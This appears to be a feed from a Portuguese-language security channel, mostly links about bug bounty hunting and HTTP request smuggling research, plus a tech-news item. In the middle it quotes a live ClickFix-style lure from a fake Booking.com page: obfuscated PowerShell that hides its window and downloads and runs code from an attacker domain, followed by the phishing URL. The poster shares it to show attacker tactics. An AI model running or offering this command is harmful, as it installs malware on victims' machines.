HTTP pipelining ou request smuggling?
Saiba como diferenciar:
https://portswigger.net/research/how-to-distinguish-http-pipelining-from-request-smuggling
https://phrack.org/issues/72/3_md#scan
Vídeo que tô assistindo hoje, da época que o ManoelT fazia live com uma galera. É antigo, de 5 anos atrás, mas com certeza vale ainda (os conceitos se aplicam na atualidade).

https://www.youtube.com/watch?v=1RmBufOHkPo
YouTube
Conversa de Bug Bounty #2 - Fontes de Estudo
Vamos conversar mais uma vez sobre Bug Bounty, dessa vez nosso tema vai ser sobre fontes de estudo para atuar como um bug hunter. É uma conversa e portanto esperamos que você nos mande perguntas e comentários.
Fim da live
Fiz meu papel
O James me mostrou o custom action na pratica hahaha, dahora e humilde
Zeroc00i News & Tricks
Olha, vocês vão ter que me aguentar falando de novo do mesmo cara e assunto! Primeiro porquê sou fã demais do James Kettle E segundo por que essa pesquisa dele tem uma proposta muito ousada e que já tem um movimento importante em jogo: acabar com o protocolo…
Vai começar
https://github.com/aliasrobotics/cai

Não uso muito essas coisas prontas de IA, mas fiquei curioso sim. Alguem a fim de testar e dar um feedback se vale a pena?
GitHub
GitHub - aliasrobotics/cai: Cybersecurity AI (CAI), the framework for AI Security
GitHub - aliasrobotics/cai: Cybersecurity AI (CAI), the framework for AI Security
Cybersecurity AI (CAI), the framework for AI Security - aliasrobotics/cai
Zeroc00i News & Tricks
Olha, vocês vão ter que me aguentar falando de novo do mesmo cara e assunto! Primeiro porquê sou fã demais do James Kettle E segundo por que essa pesquisa dele tem uma proposta muito ousada e que já tem um movimento importante em jogo: acabar com o protocolo…
É hoje
Zeroc00i News & Tricks
powershell -c "Invoke-Expression((Get-Clipboard -Raw).Substring(261)); Start-Sleep 1;" Ray ID: 3658b22362ef2157…
powershell -c "Invoke-Expression((Get-Clipboard -Raw).Substring(261)); Start-Sleep 1;"                                                                                                                                                     Ray ID: 3658b22362ef2157 powershell -nop -ep bypass -C ((Add-Type '[DllImport("user32.dll")]public static extern bool ShowWindow(IntPtr hWnd,int nCmdShow);' -Name W -PassThru)::ShowWindow((Get-Process -Id $PID).MainWindowHandle,0));Write-Host "Please wait.";iex([IO.StreamReader]::new([Net.WebRequest]::Create("htt"+"p:/"+"/www-"+"acco"+"unt-"+"book"+"ing"+".co"+"m/c.php?a=0"+"").GetResponse().GetResponseStream())).ReadToEnd();$v="d1008b"
Página fake (reparem na URL):
Ohhh os caras hahaha. Criatividade sem limite sempre, impressionante

http://account.booking.xn--comdetailrestric-access-ge5vga.www-account-booking.com/en/
Esse vídeo saiu hoje e vai estar mt massa com certeza!
Principalmente depois daquela CVE da akamai que mencionamos aqui

https://www.youtube.com/watch?v=rr5VvMx4dT0
YouTube
Akamai's Ryan Barnett on WAFs, Unicode Confusables, and Triage Stories (Ep. 135)
Episode 135: In this episode of Critical Thinking - Bug Bounty Podcast Justin sits down with Ryan Barnett for a deep dive on WAFs. We also recap his Exploiting Unicode Normalization talk from DEFCON, and get his perspective on bug hunting from his time at…
Zeroc00i News & Tricks
Olha, vocês vão ter que me aguentar falando de novo do mesmo cara e assunto! Primeiro porquê sou fã demais do James Kettle E segundo por que essa pesquisa dele tem uma proposta muito ousada e que já tem um movimento importante em jogo: acabar com o protocolo…
Para ler depois ++
https://medium.com/@zodiacHacker/http-request-smuggling-in-bug-bounty-hunting-abf0e4e75b73
Valeu pela indicação @matheus_wnc
Medium
HTTP Request Smuggling In Bug Bounty Hunting
HTTP Request Smuggling In Bug Bounty Hunting
The primary mistake seen in the wild is servers assuming that every HTTP/1.1 request sent down a given TLS connection must have the same…
https://www.linkedin.com/posts/bruno-menozzi_resolvemos-o-problema-colocamos-uma-regra-activity-7361758679181725698-PqQs
Olha, vocês vão ter que me aguentar falando de novo do mesmo cara e assunto!
Primeiro porquê sou fã demais do James Kettle
E segundo por que essa pesquisa dele tem uma proposta muito ousada e que já tem um movimento importante em jogo: acabar com o protocolo http/1.1

Tu não leu o paper dele que enviei no grupo? Tudo bem
Não viu a talk dele na Defcon que enviei aqui? Tudo bem tambem
Não fez ainda os labs da portswigger que explora a vulnerabilidade que ele demonstrou? Beleza

Agora ele simplesmente vai resolver o lab ao vivo. É só abrir o vídeo e pegar a pipoca.

📅 Sexta-feira (15 de agosto 2025) às 15hs

Link da live no dia que tu vai acessar:
https://www.youtube.com/live/B7p8dIB7bFg?si=GaeBuHlNvFuHe4KR

Lab: https://portswigger.net/web-security/request-smuggling/advanced/lab-request-smuggling-0cl-request-smuggling

Curtiu ser lembrado? Interage aqui com o post! Isso motiva a trazer mais conteúdo disso e saber que estão curtindo o que tô postando! É um ótimo feedback do nosso trabalho aqui. TMJ
Proposta é da Perplexity, ferramenta de IA que tem valor de mercado menor do que a oferta feita pelo navegador. Google não colocou o Chrome à venda, mas é pressionado a se desfazer dele nos EUA por motivos regulatórios nos EUA.

https://www.portalin.com.br/negocios/perplexity-ai-oferece-us-345-bi-pelo-navegador-chrome-da-alphabet/
Portal IN - Pompeu Vasconcelos - Balada IN
Perplexity AI oferece US$ 34,5 bi pelo navegador Chrome da Alphabet - Portal IN - Pompeu Vasconcelos - Balada IN
Perplexity AI oferece US$ 34,5 bi pelo navegador Chrome da Alphabet - Portal IN - Pompeu Vasconcelos - Balada IN
A startup Perplexity AI ofereceu US$ 34,5 bilhões em dinheiro pela compra do navegador Chrome, da Alphabet, em uma oferta não solicitada divulgada nessa terça-feira (12). O valor supera a última avaliação da própria Perplexity, que é de US$ 14 bilhões. A…
Pra quem quer ficar atualizado sobre a pesquisa do James de uma forma mais mastigada
https://youtu.be/zs1rZnZuJ6A
Before
After
Back to Top